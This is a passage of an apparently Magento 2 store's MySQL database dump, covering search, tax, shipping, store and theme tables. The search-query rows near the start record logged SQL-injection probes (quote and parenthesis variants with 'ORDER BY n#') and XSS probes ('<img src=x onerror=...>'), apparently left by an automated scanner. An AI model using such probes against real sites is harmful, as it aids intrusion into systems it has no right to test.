(7966, 'dSiI\')) ORDER BY 7571#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:32'),
(7968, 'dSiI%\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:34'),
(7970, 'dSiI%\' ORDER BY 3139#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:36'),
(7974, 'dSiI\' ORDER BY 6787#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:41'),
(7976, 'dSiI\") ORDER BY 1#', 0, 2, NULL, 1, 1, 1, 0, '2025-11-06 16:19:58'),
(7978, 'dSiI\") ORDER BY 1539#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:45'),
(7980, 'dSiI\")) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:47'),
(7982, 'dSiI\")) ORDER BY 2288#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:50'),
(7984, 'dSiI\" ORDER BY 1#', 0, 2, NULL, 1, 1, 1, 0, '2025-11-06 16:20:02'),
(7986, 'dSiI\" ORDER BY 5793#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:56'),
(7990, 'dSiI\") ORDER BY 9038#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:00'),
(7994, 'dSiI\" ORDER BY 4978#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:04'),
(7998, 'dSiI\' ORDER BY 6106#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:08'),
(8000, 'dSiI) ORDER BY 1#', 0, 2, NULL, 1, 1, 1, 0, '2025-11-06 16:20:14'),
(8002, 'dSiI) ORDER BY 3646#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:12'),
(8006, 'dSiI) ORDER BY 5056#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:16'),
(8008, 'dSiI)) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:19'),
(8010, 'dSiI)) ORDER BY 6312#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:21'),
(8012, 'dSiI))) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:23'),
(8014, 'dSiI))) ORDER BY 2679#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:27'),
(8016, 'dSiI ORDER BY 1#', 0, 3, NULL, 1, 1, 1, 0, '2025-11-06 16:20:38'),
(8018, 'dSiI ORDER BY 9945#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:31'),
(8022, 'dSiI ORDER BY 7272#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:35'),
(8026, 'dSiI ORDER BY 6704#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:40'),
(8028, '-9749\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:42'),
(8030, '-1088\' ORDER BY 9694#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:44'),
(8032, '-5487\') ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:46'),
(8034, '-1800\') ORDER BY 3724#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:48'),
(8036, '-7648\')) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:50'),
(8038, '-7500\')) ORDER BY 8782#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:52'),
(8040, '-9777\'))) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:54'),
(8042, '-6013\'))) ORDER BY 8833#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:56'),
(8044, '-6998\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:20:58'),
(8046, '-7663\' ORDER BY 2331#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:00'),
(8048, '-4557\') ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:02'),
(8050, '-6261\') ORDER BY 2408#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:05'),
(8052, '-4856\')) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:08'),
(8054, '-3567\')) ORDER BY 8012#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:10'),
(8056, '-9951%\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:12'),
(8058, '-6648%\' ORDER BY 3788#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:15'),
(8060, '-6965\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:18'),
(8062, '-5908\' ORDER BY 8168#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:20'),
(8064, '-9335\") ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:22'),
(8066, '-3172\") ORDER BY 4929#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:24'),
(8068, '-9501\")) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:26'),
(8070, '-9917\")) ORDER BY 9664#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:28'),
(8072, '-8828\" ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:30'),
(8074, '-3997\" ORDER BY 3245#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:32'),
(8076, '-7767\") ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:34'),
(8078, '-2998\") ORDER BY 9483#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:37'),
(8080, '-8336\" ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:42'),
(8082, '-4790\" ORDER BY 4329#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:45'),
(8084, '-7395\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:48'),
(8086, '-4802\' ORDER BY 8607#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:51'),
(8088, '-6985) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:54'),
(8090, '-3035) ORDER BY 7243#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:56'),
(8092, '-2215) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:21:58'),
(8094, '-9504) ORDER BY 1369#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:00'),
(8096, '-3287)) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:02'),
(8098, '-3411)) ORDER BY 6861#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:04'),
(8100, '-7290))) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:06'),
(8102, '-1340))) ORDER BY 5683#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:08'),
(8104, '-6317 ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:10'),
(8106, '-2224 ORDER BY 9644#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:12'),
(8108, '-9679 ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:14'),
(8110, '-8901 ORDER BY 1386#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:16'),
(8112, '-8356 ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:18'),
(8114, '-9977 ORDER BY 3632#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:22:20'),
(13596, 'XSS86548', 0, 1, NULL, 1, 1, 1, 0, '2026-02-05 21:32:11'),
(13598, '\"XSS86548\"', 0, 1, NULL, 1, 1, 1, 0, '2026-02-05 21:32:14'),
(13600, '<img src=x onerror=XSS86548>', 0, 1, NULL, 1, 1, 1, 0, '2026-02-05 21:32:21'),
(13602, '\"><img src=x onerror=XSS86548>', 0, 1, NULL, 1, 1, 1, 0, '2026-02-05 21:32:24'),
(13613, 'a a', 7, 1, NULL, 1, 1, 1, 0, '2026-02-26 03:16:52'),
(13621, '1 a', 7, 1, NULL, 1, 1, 1, 0, '2026-03-20 09:25:43'),
(13627, 'test69cb807142205', 0, 1, NULL, 1, 1, 1, 0, '2026-03-31 08:06:10');

-- --------------------------------------------------------

--
-- Table structure for table `search_synonyms`
--

CREATE TABLE `search_synonyms` (
  `group_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Synonyms Group ID',
  `synonyms` text NOT NULL COMMENT 'list of synonyms making up this group',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID - identifies the store view these synonyms belong to',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID - identifies the website ID these synonyms belong to'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='table storing various synonyms groups';

-- --------------------------------------------------------

--
-- Table structure for table `sendfriend_log`
--

CREATE TABLE `sendfriend_log` (
  `log_id` int(10) UNSIGNED NOT NULL COMMENT 'Log ID',
  `ip` bigint(20) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer IP address',
  `time` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Log time',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Send to friend function log storage table';

-- --------------------------------------------------------

--
-- Table structure for table `sequence_creditmemo_0`
--

CREATE TABLE `sequence_creditmemo_0` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Table structure for table `sequence_creditmemo_1`
--

CREATE TABLE `sequence_creditmemo_1` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_creditmemo_1`
--

INSERT INTO `sequence_creditmemo_1` (`sequence_value`) VALUES
(1);

-- --------------------------------------------------------

--
-- Table structure for table `sequence_invoice_0`
--

CREATE TABLE `sequence_invoice_0` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Table structure for table `sequence_invoice_1`
--

CREATE TABLE `sequence_invoice_1` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_invoice_1`
--

INSERT INTO `sequence_invoice_1` (`sequence_value`) VALUES
(1),
(2);

-- --------------------------------------------------------

--
-- Table structure for table `sequence_order_0`
--

CREATE TABLE `sequence_order_0` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Table structure for table `sequence_order_1`
--

CREATE TABLE `sequence_order_1` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_order_1`
--

INSERT INTO `sequence_order_1` (`sequence_value`) VALUES
(1),
(2),
(3);

-- --------------------------------------------------------

--
-- Table structure for table `sequence_shipment_0`
--

CREATE TABLE `sequence_shipment_0` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Table structure for table `sequence_shipment_1`
--

CREATE TABLE `sequence_shipment_1` (
  `sequence_value` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_shipment_1`
--

INSERT INTO `sequence_shipment_1` (`sequence_value`) VALUES
(1),
(2);

-- --------------------------------------------------------

--
-- Table structure for table `session`
--

CREATE TABLE `session` (
  `session_id` varchar(255) NOT NULL COMMENT 'Session Id',
  `session_expires` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Date of Session Expiration',
  `session_data` mediumblob NOT NULL COMMENT 'Session Data'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Database Sessions Storage';

-- --------------------------------------------------------

--
-- Table structure for table `setup_module`
--

CREATE TABLE `setup_module` (
  `module` varchar(50) NOT NULL COMMENT 'Module',
  `schema_version` varchar(50) DEFAULT NULL COMMENT 'Schema Version',
  `data_version` varchar(50) DEFAULT NULL COMMENT 'Data Version'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Module versions registry';

--
-- Dumping data for table `setup_module`
--

INSERT INTO `setup_module` (`module`, `schema_version`, `data_version`) VALUES
('Amazon_Core', '3.4.1', '3.4.1'),
('Amazon_Login', '3.4.1', '3.4.1'),
('Amazon_Payment', '3.4.1', '3.4.1'),
('Dotdigitalgroup_Chat', '1.0.1', '1.0.1'),
('Dotdigitalgroup_Email', '4.4.0', '4.4.0'),
('Est_Bismoy', '1.1.0', '1.1.0'),
('Klarna_Core', '5.2.3', '5.2.3'),
('Klarna_Kp', '6.4.0', '6.4.0'),
('Klarna_Ordermanagement', '5.0.7', '5.0.7'),
('Magento_AuthorizenetAcceptjs', '1.0.0', '1.0.0'),
('Magento_GoogleShoppingAds', '3.0.1', '3.0.1'),
('Magento_PaypalReCaptcha', '2.0.0', '2.0.0'),
('Mageplaza_BannerSlider', '2.0.0', '2.0.0'),
('Mageplaza_Core', '1.0.0', '1.0.0'),
('MSP_ReCaptcha', '1.6.0', '1.6.0'),
('MSP_TwoFactorAuth', '3.1.0', '3.1.0'),
('Vertex_AddressValidation', '100.5.0', '100.5.0'),
('Vertex_Tax', '100.5.1', '100.5.1'),
('Yotpo_Yotpo', '3.1.0', '3.1.0');

-- --------------------------------------------------------

--
-- Table structure for table `shipping_tablerate`
--

CREATE TABLE `shipping_tablerate` (
  `pk` int(10) UNSIGNED NOT NULL COMMENT 'Primary key',
  `website_id` int(11) NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `dest_country_id` varchar(4) NOT NULL DEFAULT '0' COMMENT 'Destination coutry ISO/2 or ISO/3 code',
  `dest_region_id` int(11) NOT NULL DEFAULT 0 COMMENT 'Destination Region ID',
  `dest_zip` varchar(10) NOT NULL DEFAULT '*' COMMENT 'Destination Post Code (Zip)',
  `condition_name` varchar(30) NOT NULL COMMENT 'Rate Condition name',
  `condition_value` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Rate condition value',
  `price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Price',
  `cost` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Cost'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Shipping Tablerate';

--
-- Dumping data for table `shipping_tablerate`
--

INSERT INTO `shipping_tablerate` (`pk`, `website_id`, `dest_country_id`, `dest_region_id`, `dest_zip`, `condition_name`, `condition_value`, `price`, `cost`) VALUES
(1, 1, 'US', 0, '*', 'package_value_with_discount', 0.0000, 15.0000, 0.0000),
(2, 1, 'US', 0, '*', 'package_value_with_discount', 50.0000, 10.0000, 0.0000),
(3, 1, 'US', 0, '*', 'package_value_with_discount', 100.0000, 5.0000, 0.0000),
(4, 1, 'US', 2, '*', 'package_value_with_discount', 0.0000, 20.0000, 0.0000),
(5, 1, 'US', 2, '*', 'package_value_with_discount', 50.0000, 15.0000, 0.0000),
(6, 1, 'US', 2, '*', 'package_value_with_discount', 100.0000, 10.0000, 0.0000),
(7, 1, 'US', 21, '*', 'package_value_with_discount', 0.0000, 20.0000, 0.0000),
(8, 1, 'US', 21, '*', 'package_value_with_discount', 50.0000, 15.0000, 0.0000),
(9, 1, 'US', 21, '*', 'package_value_with_discount', 100.0000, 10.0000, 0.0000);

-- --------------------------------------------------------

--
-- Table structure for table `signifyd_case`
--

CREATE TABLE `signifyd_case` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity_id',
  `order_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Order_id',
  `case_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Case_id',
  `guarantee_eligible` tinyint(1) DEFAULT NULL COMMENT 'Guarantee_eligible',
  `guarantee_disposition` varchar(32) DEFAULT 'PENDING' COMMENT 'Guarantee_disposition',
  `status` varchar(32) DEFAULT 'PENDING' COMMENT 'Status',
  `score` int(10) UNSIGNED DEFAULT NULL COMMENT 'Score',
  `associated_team` text DEFAULT NULL COMMENT 'Associated_team',
  `review_disposition` varchar(32) DEFAULT NULL COMMENT 'Review_disposition',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created_at',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated_at'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='signifyd_case';

-- --------------------------------------------------------

--
-- Table structure for table `sitemap`
--

CREATE TABLE `sitemap` (
  `sitemap_id` int(10) UNSIGNED NOT NULL COMMENT 'Sitemap ID',
  `sitemap_type` varchar(32) DEFAULT NULL COMMENT 'Sitemap Type',
  `sitemap_filename` varchar(32) DEFAULT NULL COMMENT 'Sitemap Filename',
  `sitemap_path` varchar(255) DEFAULT NULL COMMENT 'Sitemap Path',
  `sitemap_time` timestamp NULL DEFAULT NULL COMMENT 'Sitemap Time',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='XML Sitemap';

-- --------------------------------------------------------

--
-- Table structure for table `store`
--

CREATE TABLE `store` (
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `code` varchar(32) DEFAULT NULL COMMENT 'Code',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `group_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Group ID',
  `name` varchar(255) NOT NULL COMMENT 'Store Name',
  `sort_order` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store Sort Order',
  `is_active` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store Activity'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores';

--
-- Dumping data for table `store`
--

INSERT INTO `store` (`store_id`, `code`, `website_id`, `group_id`, `name`, `sort_order`, `is_active`) VALUES
(0, 'admin', 0, 0, 'Admin', 0, 1),
(1, 'default', 1, 1, 'Default Store View', 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `store_group`
--

CREATE TABLE `store_group` (
  `group_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `name` varchar(255) NOT NULL COMMENT 'Store Group Name',
  `root_category_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Root Category ID',
  `default_store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Default Store ID',
  `code` varchar(32) DEFAULT NULL COMMENT 'Store group unique code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Store Groups';

--
-- Dumping data for table `store_group`
--

INSERT INTO `store_group` (`group_id`, `website_id`, `name`, `root_category_id`, `default_store_id`, `code`) VALUES
(0, 0, 'Default', 0, 0, 'default'),
(1, 1, 'Main Website Store', 2, 1, 'main_website_store');

-- --------------------------------------------------------

--
-- Table structure for table `store_website`
--

CREATE TABLE `store_website` (
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `code` varchar(32) DEFAULT NULL COMMENT 'Code',
  `name` varchar(64) DEFAULT NULL COMMENT 'Website Name',
  `sort_order` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order',
  `default_group_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Default Group ID',
  `is_default` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Defines Is Website Default'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Websites';

--
-- Dumping data for table `store_website`
--

INSERT INTO `store_website` (`website_id`, `code`, `name`, `sort_order`, `default_group_id`, `is_default`) VALUES
(0, 'admin', 'Admin', 0, 0, 0),
(1, 'base', 'Main Website', 0, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tax_calculation`
--

CREATE TABLE `tax_calculation` (
  `tax_calculation_id` int(11) NOT NULL COMMENT 'Tax Calculation ID',
  `tax_calculation_rate_id` int(11) NOT NULL COMMENT 'Tax Calculation Rate ID',
  `tax_calculation_rule_id` int(11) NOT NULL COMMENT 'Tax Calculation Rule ID',
  `customer_tax_class_id` smallint(6) NOT NULL COMMENT 'Customer Tax Class ID',
  `product_tax_class_id` smallint(6) NOT NULL COMMENT 'Product Tax Class ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Calculation';

--
-- Dumping data for table `tax_calculation`
--

INSERT INTO `tax_calculation` (`tax_calculation_id`, `tax_calculation_rate_id`, `tax_calculation_rule_id`, `customer_tax_class_id`, `product_tax_class_id`) VALUES
(1, 3, 1, 3, 2);

-- --------------------------------------------------------

--
-- Table structure for table `tax_calculation_rate`
--

CREATE TABLE `tax_calculation_rate` (
  `tax_calculation_rate_id` int(11) NOT NULL COMMENT 'Tax Calculation Rate ID',
  `tax_country_id` varchar(2) NOT NULL COMMENT 'Tax Country ID',
  `tax_region_id` int(11) NOT NULL COMMENT 'Tax Region ID',
  `tax_postcode` varchar(21) DEFAULT NULL COMMENT 'Tax Postcode',
  `code` varchar(255) NOT NULL COMMENT 'Code',
  `rate` decimal(12,4) NOT NULL COMMENT 'Rate',
  `zip_is_range` smallint(6) DEFAULT NULL COMMENT 'Zip Is Range',
  `zip_from` int(10) UNSIGNED DEFAULT NULL COMMENT 'Zip From',
  `zip_to` int(10) UNSIGNED DEFAULT NULL COMMENT 'Zip To'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Calculation Rate';

--
-- Dumping data for table `tax_calculation_rate`
--

INSERT INTO `tax_calculation_rate` (`tax_calculation_rate_id`, `tax_country_id`, `tax_region_id`, `tax_postcode`, `code`, `rate`, `zip_is_range`, `zip_from`, `zip_to`) VALUES
(1, 'US', 12, '*', 'US-CA-*-Rate 1', 8.2500, NULL, NULL, NULL),
(2, 'US', 43, '*', 'US-NY-*-Rate 1', 8.3750, NULL, NULL, NULL),
(3, 'US', 33, '*', 'US-MI-*-Rate 1', 8.2500, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tax_calculation_rate_title`
--

CREATE TABLE `tax_calculation_rate_title` (
  `tax_calculation_rate_title_id` int(11) NOT NULL COMMENT 'Tax Calculation Rate Title ID',
  `tax_calculation_rate_id` int(11) NOT NULL COMMENT 'Tax Calculation Rate ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `value` varchar(255) NOT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Calculation Rate Title';

-- --------------------------------------------------------

--
-- Table structure for table `tax_calculation_rule`
--

CREATE TABLE `tax_calculation_rule` (
  `tax_calculation_rule_id` int(11) NOT NULL COMMENT 'Tax Calculation Rule ID',
  `code` varchar(255) NOT NULL COMMENT 'Code',
  `priority` int(11) NOT NULL COMMENT 'Priority',
  `position` int(11) NOT NULL COMMENT 'Position',
  `calculate_subtotal` int(11) NOT NULL COMMENT 'Calculate off subtotal option'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Calculation Rule';

--
-- Dumping data for table `tax_calculation_rule`
--

INSERT INTO `tax_calculation_rule` (`tax_calculation_rule_id`, `code`, `priority`, `position`, `calculate_subtotal`) VALUES
(1, 'Rule1', 0, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tax_class`
--

CREATE TABLE `tax_class` (
  `class_id` smallint(6) NOT NULL COMMENT 'Class ID',
  `class_name` varchar(255) NOT NULL COMMENT 'Class Name',
  `class_type` varchar(8) NOT NULL DEFAULT 'CUSTOMER' COMMENT 'Class Type'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Class';

--
-- Dumping data for table `tax_class`
--

INSERT INTO `tax_class` (`class_id`, `class_name`, `class_type`) VALUES
(2, 'Taxable Goods', 'PRODUCT'),
(3, 'Retail Customer', 'CUSTOMER'),
(4, 'Refund Adjustments', 'PRODUCT'),
(5, 'Gift Options', 'PRODUCT'),
(6, 'Order Gift Wrapping', 'PRODUCT'),
(7, 'Item Gift Wrapping', 'PRODUCT'),
(8, 'Printed Gift Card', 'PRODUCT'),
(9, 'Reward Points', 'PRODUCT');

-- --------------------------------------------------------

--
-- Table structure for table `tax_order_aggregated_created`
--

CREATE TABLE `tax_order_aggregated_created` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `code` varchar(255) NOT NULL COMMENT 'Code',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `percent` float DEFAULT NULL COMMENT 'Percent',
  `orders_count` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `tax_base_amount_sum` float DEFAULT NULL COMMENT 'Tax Base Amount Sum'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Order Aggregation';

--
-- Dumping data for table `tax_order_aggregated_created`
--

INSERT INTO `tax_order_aggregated_created` (`id`, `period`, `store_id`, `code`, `order_status`, `percent`, `orders_count`, `tax_base_amount_sum`) VALUES
(1, '2020-08-08', 1, 'US-MI-*-Rate 1', 'closed', 8.25, 1, 2.64),
(2, '2020-08-08', 1, 'US-MI-*-Rate 1', 'processing', 8.25, 1, 2.39),
(3, '2020-08-08', 0, 'US-MI-*-Rate 1', 'closed', 8.25, 1, 2.64),
(4, '2020-08-08', 0, 'US-MI-*-Rate 1', 'processing', 8.25, 1, 2.39);

-- --------------------------------------------------------

--
-- Table structure for table `tax_order_aggregated_updated`
--

CREATE TABLE `tax_order_aggregated_updated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `code` varchar(255) NOT NULL COMMENT 'Code',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `percent` float DEFAULT NULL COMMENT 'Percent',
  `orders_count` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Orders Count',
  `tax_base_amount_sum` float DEFAULT NULL COMMENT 'Tax Base Amount Sum'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Tax Order Aggregated Updated';

--
-- Dumping data for table `tax_order_aggregated_updated`
--

INSERT INTO `tax_order_aggregated_updated` (`id`, `period`, `store_id`, `code`, `order_status`, `percent`, `orders_count`, `tax_base_amount_sum`) VALUES
(1, '2020-08-08', 1, 'US-MI-*-Rate 1', 'closed', 8.25, 1, 2.64),
(2, '2020-08-08', 1, 'US-MI-*-Rate 1', 'processing', 8.25, 1, 2.39),
(3, '2020-08-08', 0, 'US-MI-*-Rate 1', 'closed', 8.25, 1, 2.64),
(4, '2020-08-08', 0, 'US-MI-*-Rate 1', 'processing', 8.25, 1, 2.39);

-- --------------------------------------------------------

--
-- Table structure for table `theme`
--

CREATE TABLE `theme` (
  `theme_id` int(10) UNSIGNED NOT NULL COMMENT 'Theme identifier',
  `parent_id` int(11) DEFAULT NULL COMMENT 'Parent ID',
  `theme_path` varchar(255) DEFAULT NULL COMMENT 'Theme Path',
  `theme_title` varchar(255) NOT NULL COMMENT 'Theme Title',
  `preview_image` varchar(255) DEFAULT NULL COMMENT 'Preview Image',
  `is_featured` tinyint(1) NOT NULL DEFAULT 0 COMMENT 'Is Theme Featured',
  `area` varchar(255) NOT NULL COMMENT 'Theme Area',
  `type` smallint(6) NOT NULL COMMENT 'Theme type: 0:physical, 1:virtual, 2:staging',
  `code` text DEFAULT NULL COMMENT 'Full theme code, including package'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Core theme';

--
-- Dumping data for table `theme`
--

INSERT INTO `theme` (`theme_id`, `parent_id`, `theme_path`, `theme_title`, `preview_image`, `is_featured`, `area`, `type`, `code`) VALUES
(1, NULL, 'Magento/blank', 'Magento Blank', 'preview_image_5f26bbd292c72.jpeg', 0, 'frontend', 0, 'Magento/blank'),
(2, NULL, 'Magento/backend', 'Magento 2 backend', NULL, 0, 'adminhtml', 0, 'Magento/backend'),
(3, 1, 'Magento/luma', 'Magento Luma', 'preview_image_5f26bbd2c5248.jpeg', 0, 'frontend', 0, 'Magento/luma'),
(4, 3, 'Est/Bismoy', 'Bismoy', NULL, 0, 'frontend', 0, 'Est/Bismoy');

-- --------------------------------------------------------

--
-- Table structure for table `theme_file`
--

CREATE TABLE `theme_file` (
  `theme_files_id` int(10) UNSIGNED NOT NULL COMMENT 'Theme files identifier',
  `theme_id` int(10) UNSIGNED NOT NULL COMMENT 'Theme ID',
  `file_path` varchar(255) DEFAULT NULL COMMENT 'Relative path to file',
  `file_type` varchar(32) NOT NULL COMMENT 'File Type',
  `content` longtext NOT NULL COMMENT 'File Content',
  `sort_order` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Sort Order',
